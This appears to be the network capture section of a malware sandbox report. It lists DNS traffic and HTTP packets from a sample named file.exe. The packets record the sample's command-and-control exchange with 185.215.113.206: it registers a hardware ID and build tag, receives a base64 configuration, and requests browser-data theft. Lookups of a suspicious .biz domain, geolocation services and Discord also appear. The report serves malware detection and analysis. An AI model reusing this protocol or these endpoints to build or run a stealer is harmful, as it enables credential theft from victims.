Dec 10, 2024 00:44:35.436114073 CET	192.168.2.4	1.1.1.1	0x7f86	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:35.507364035 CET	192.168.2.4	1.1.1.1	0xbaa4	Standard query (0)	contile.services.mozilla.com	28	IN (0x0001)	false
Dec 10, 2024 00:44:35.529459953 CET	192.168.2.4	1.1.1.1	0xb5d6	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:35.568094969 CET	192.168.2.4	1.1.1.1	0xde42	Standard query (0)	youtube.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:35.967195034 CET	192.168.2.4	1.1.1.1	0xd0de	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:44:36.838084936 CET	192.168.2.4	1.1.1.1	0x76c5	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:38.038513899 CET	192.168.2.4	1.1.1.1	0x686	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:39.514533997 CET	192.168.2.4	1.1.1.1	0x73f6	Standard query (0)	231.12.13.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Dec 10, 2024 00:44:39.843106985 CET	192.168.2.4	1.1.1.1	0x3a11	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:43.082564116 CET	192.168.2.4	1.1.1.1	0x8e07	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:43.332504034 CET	192.168.2.4	1.1.1.1	0x8e07	Standard query (0)	api.mylnikov.org	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:46.558861017 CET	192.168.2.4	1.1.1.1	0xe90d	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:45:04.398904085 CET	192.168.2.4	1.1.1.1	0xfb13	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:45:04.541157961 CET	192.168.2.4	1.1.1.1	0x30b3	Standard query (0)	prod.balrog.prod.cloudops.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:45:34.264631033 CET	192.168.2.4	1.1.1.1	0xea58	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:46:26.161808968 CET	192.168.2.4	1.1.1.1	0xb61b	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:46:26.162024021 CET	192.168.2.4	1.1.1.1	0xe828	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Dec 10, 2024 00:47:24.399322987 CET	192.168.2.4	1.1.1.1	0x71b6	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:47:24.653507948 CET	192.168.2.4	1.1.1.1	0x71b6	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:26.182060957 CET	192.168.2.4	1.1.1.1	0xc854	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:26.182214975 CET	192.168.2.4	1.1.1.1	0xa0b1	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Dec 10, 2024 00:49:35.966624022 CET	192.168.2.4	1.1.1.1	0xae25	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:36.107976913 CET	192.168.2.4	1.1.1.1	0x9f14	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:49:36.374106884 CET	192.168.2.4	1.1.1.1	0x9f14	Standard query (0)	prod.ads.prod.webservices.mozgcp.net	28	IN (0x0001)	false
Dec 10, 2024 00:49:37.204761028 CET	192.168.2.4	1.1.1.1	0x33be	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:50:06.043709040 CET	192.168.2.4	1.1.1.1	0xab7e	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:50:52.680495024 CET	192.168.2.4	1.1.1.1	0x5de4	Standard query (0)	detectportal.firefox.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 00:42:09.719834089 CET	1.1.1.1	192.168.2.4	0xfe57	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:42:09.720323086 CET	1.1.1.1	192.168.2.4	0x80da	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 10, 2024 00:42:16.472829103 CET	1.1.1.1	192.168.2.4	0x9a67	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:42:16.473264933 CET	1.1.1.1	192.168.2.4	0x1b73	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:42:16.473264933 CET	1.1.1.1	192.168.2.4	0x1b73	No error (0)	plus.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.32.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:32.979667902 CET	1.1.1.1	192.168.2.4	0x1234	No error (0)	atten-supporse.biz		104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:55.313472986 CET	1.1.1.1	192.168.2.4	0x4df6	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:43:55.640821934 CET	1.1.1.1	192.168.2.4	0xd4aa	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:00.288048029 CET	1.1.1.1	192.168.2.4	0xfd55	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:00.288048029 CET	1.1.1.1	192.168.2.4	0xfd55	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:00.288074017 CET	1.1.1.1	192.168.2.4	0x26e9	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:01.475364923 CET	1.1.1.1	192.168.2.4	0xac90	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:01.476435900 CET	1.1.1.1	192.168.2.4	0x8254	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:01.618891001 CET	1.1.1.1	192.168.2.4	0x7340	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net			28	IN (0x0001)	false
Dec 10, 2024 00:44:01.715890884 CET	1.1.1.1	192.168.2.4	0xa5ba	No error (0)	youtube.com			28	IN (0x0001)	false
Dec 10, 2024 00:44:02.484364986 CET	1.1.1.1	192.168.2.4	0xb9a5	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.599519014 CET	1.1.1.1	192.168.2.4	0xc7e2	No error (0)	spocs.getpocket.com	prod.ads.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:02.599519014 CET	1.1.1.1	192.168.2.4	0xc7e2	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.624784946 CET	1.1.1.1	192.168.2.4	0xb60c	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:02.624784946 CET	1.1.1.1	192.168.2.4	0xb60c	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.636215925 CET	1.1.1.1	192.168.2.4	0xb696	No error (0)	contile.services.mozilla.com		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.756469011 CET	1.1.1.1	192.168.2.4	0x8381	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.823824883 CET	1.1.1.1	192.168.2.4	0xc0e2	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:02.823824883 CET	1.1.1.1	192.168.2.4	0xc0e2	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:02.868793964 CET	1.1.1.1	192.168.2.4	0xf94e	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:02.868793964 CET	1.1.1.1	192.168.2.4	0xf94e	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:02.868793964 CET	1.1.1.1	192.168.2.4	0xf94e	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:03.020314932 CET	1.1.1.1	192.168.2.4	0x9cd5	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:03.053138018 CET	1.1.1.1	192.168.2.4	0x28a8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:03.102404118 CET	1.1.1.1	192.168.2.4	0xb428	No error (0)	shavar.services.mozilla.com	shavar.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:03.160476923 CET	1.1.1.1	192.168.2.4	0xd049	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net			28	IN (0x0001)	false
Dec 10, 2024 00:44:07.098121881 CET	1.1.1.1	192.168.2.4	0xa544	No error (0)	example.org		93.184.215.14	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:07.098259926 CET	1.1.1.1	192.168.2.4	0x6fed	No error (0)	ipv4only.arpa		192.0.0.171	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:07.098259926 CET	1.1.1.1	192.168.2.4	0x6fed	No error (0)	ipv4only.arpa		192.0.0.170	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:10.096767902 CET	1.1.1.1	192.168.2.4	0xd752	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:10.096767902 CET	1.1.1.1	192.168.2.4	0xd752	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:19.686486959 CET	1.1.1.1	192.168.2.4	0x865b	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:19.688421011 CET	1.1.1.1	192.168.2.4	0x3b45	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 10, 2024 00:44:23.595211029 CET	1.1.1.1	192.168.2.4	0x859b	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.595211029 CET	1.1.1.1	192.168.2.4	0x859b	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.595211029 CET	1.1.1.1	192.168.2.4	0x859b	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.595211029 CET	1.1.1.1	192.168.2.4	0x859b	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:23.860783100 CET	1.1.1.1	192.168.2.4	0x92e0	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.928437948 CET	1.1.1.1	192.168.2.4	0x5f94	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.928437948 CET	1.1.1.1	192.168.2.4	0x5f94	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.928437948 CET	1.1.1.1	192.168.2.4	0x5f94	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:23.948239088 CET	1.1.1.1	192.168.2.4	0xa28a	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:23.948239088 CET	1.1.1.1	192.168.2.4	0xa28a	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:26.561480045 CET	1.1.1.1	192.168.2.4	0xd81b	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:26.561752081 CET	1.1.1.1	192.168.2.4	0xac0d	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:27.185420990 CET	1.1.1.1	192.168.2.4	0x7907	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:27.185420990 CET	1.1.1.1	192.168.2.4	0x7907	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:35.561057091 CET	1.1.1.1	192.168.2.4	0x6d32	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:35.575546980 CET	1.1.1.1	192.168.2.4	0x7f86	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:35.575546980 CET	1.1.1.1	192.168.2.4	0x7f86	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:35.707459927 CET	1.1.1.1	192.168.2.4	0xde42	No error (0)	youtube.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:35.951040030 CET	1.1.1.1	192.168.2.4	0x31d8	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:35.951040030 CET	1.1.1.1	192.168.2.4	0x31d8	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:36.976486921 CET	1.1.1.1	192.168.2.4	0x76c5	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:44:36.976486921 CET	1.1.1.1	192.168.2.4	0x76c5	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:38.177005053 CET	1.1.1.1	192.168.2.4	0x686	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:38.177005053 CET	1.1.1.1	192.168.2.4	0x686	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:39.652283907 CET	1.1.1.1	192.168.2.4	0x73f6	Name error (3)	231.12.13.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Dec 10, 2024 00:44:39.980509996 CET	1.1.1.1	192.168.2.4	0x3a11	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:43.685524940 CET	1.1.1.1	192.168.2.4	0x8e07	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:43.685524940 CET	1.1.1.1	192.168.2.4	0x8e07	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:43.685537100 CET	1.1.1.1	192.168.2.4	0x8e07	No error (0)	api.mylnikov.org		172.67.196.114	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:43.685537100 CET	1.1.1.1	192.168.2.4	0x8e07	No error (0)	api.mylnikov.org		104.21.44.66	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:46.695569992 CET	1.1.1.1	192.168.2.4	0xe90d	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:46.695569992 CET	1.1.1.1	192.168.2.4	0xe90d	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:46.695569992 CET	1.1.1.1	192.168.2.4	0xe90d	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:46.695569992 CET	1.1.1.1	192.168.2.4	0xe90d	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:44:46.695569992 CET	1.1.1.1	192.168.2.4	0xe90d	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:45:04.537664890 CET	1.1.1.1	192.168.2.4	0x755d	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:45:04.537664890 CET	1.1.1.1	192.168.2.4	0x755d	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:45:04.538146019 CET	1.1.1.1	192.168.2.4	0xfb13	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:45:34.427130938 CET	1.1.1.1	192.168.2.4	0xea58	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:45:34.427130938 CET	1.1.1.1	192.168.2.4	0xea58	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:46:26.300088882 CET	1.1.1.1	192.168.2.4	0xe828	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:46:26.399550915 CET	1.1.1.1	192.168.2.4	0xb61b	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:47:24.778395891 CET	1.1.1.1	192.168.2.4	0x71b6	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:47:24.778395891 CET	1.1.1.1	192.168.2.4	0x71b6	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:47:24.794969082 CET	1.1.1.1	192.168.2.4	0x71b6	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:47:24.794969082 CET	1.1.1.1	192.168.2.4	0x71b6	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:26.319674969 CET	1.1.1.1	192.168.2.4	0xa0b1	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:49:26.407586098 CET	1.1.1.1	192.168.2.4	0xc854	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:49:28.202133894 CET	1.1.1.1	192.168.2.4	0xa371	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:28.202133894 CET	1.1.1.1	192.168.2.4	0xa371	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:36.105182886 CET	1.1.1.1	192.168.2.4	0xae25	No error (0)	prod.ads.prod.webservices.mozgcp.net		34.117.188.166	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:49:37.344394922 CET	1.1.1.1	192.168.2.4	0x33be	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:49:37.344394922 CET	1.1.1.1	192.168.2.4	0x33be	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:50:06.184608936 CET	1.1.1.1	192.168.2.4	0xab7e	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:50:06.184608936 CET	1.1.1.1	192.168.2.4	0xab7e	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 10, 2024 00:50:52.819684029 CET	1.1.1.1	192.168.2.4	0x5de4	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 10, 2024 00:50:52.819684029 CET	1.1.1.1	192.168.2.4	0x5de4	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.206	80	7288	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 00:42:00.677797079 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:42:02.020251989 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:02.023504019 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIECBFIDGDAKFHIEHJKF Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 36 34 39 46 42 30 46 45 31 35 34 33 32 30 37 36 30 33 31 36 34 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 2d 2d 0d 0a Data Ascii: ------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="hwid"9649FB0FE1543207603164------FIECBFIDGDAKFHIEHJKFContent-Disposition: form-data; name="build"stok------FIECBFIDGDAKFHIEHJKF--
Dec 10, 2024 00:42:02.483445883 CET	407	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:02 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 5a 57 5a 69 4d 7a 51 78 5a 6a 67 34 4d 57 5a 6d 4e 6d 49 30 4e 54 6b 77 4e 6a 49 77 4e 7a 67 32 4f 44 51 33 5a 57 4e 6c 4e 54 4e 6d 4e 6a 55 32 5a 6a 4d 77 4e 44 52 6c 4d 44 45 77 4e 47 4d 78 4d 7a 41 35 5a 57 59 32 4d 32 4d 77 4e 44 63 31 4f 54 45 30 4e 54 55 30 4d 47 4a 68 4e 54 45 34 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: ZWZiMzQxZjg4MWZmNmI0NTkwNjIwNzg2ODQ3ZWNlNTNmNjU2ZjMwNDRlMDEwNGMxMzA5ZWY2M2MwNDc1OTE0NTU0MGJhNTE4fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 10, 2024 00:42:02.484852076 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFIIEBKEGHJJJJJJDA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 49 49 45 42 4b 45 47 48 4a 4a 4a 4a 4a 4a 44 41 2d 2d 0d 0a Data Ascii: ------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------CGCFIIEBKEGHJJJJJJDAContent-Disposition: form-data; name="message"browsers------CGCFIIEBKEGHJJJJJJDA--
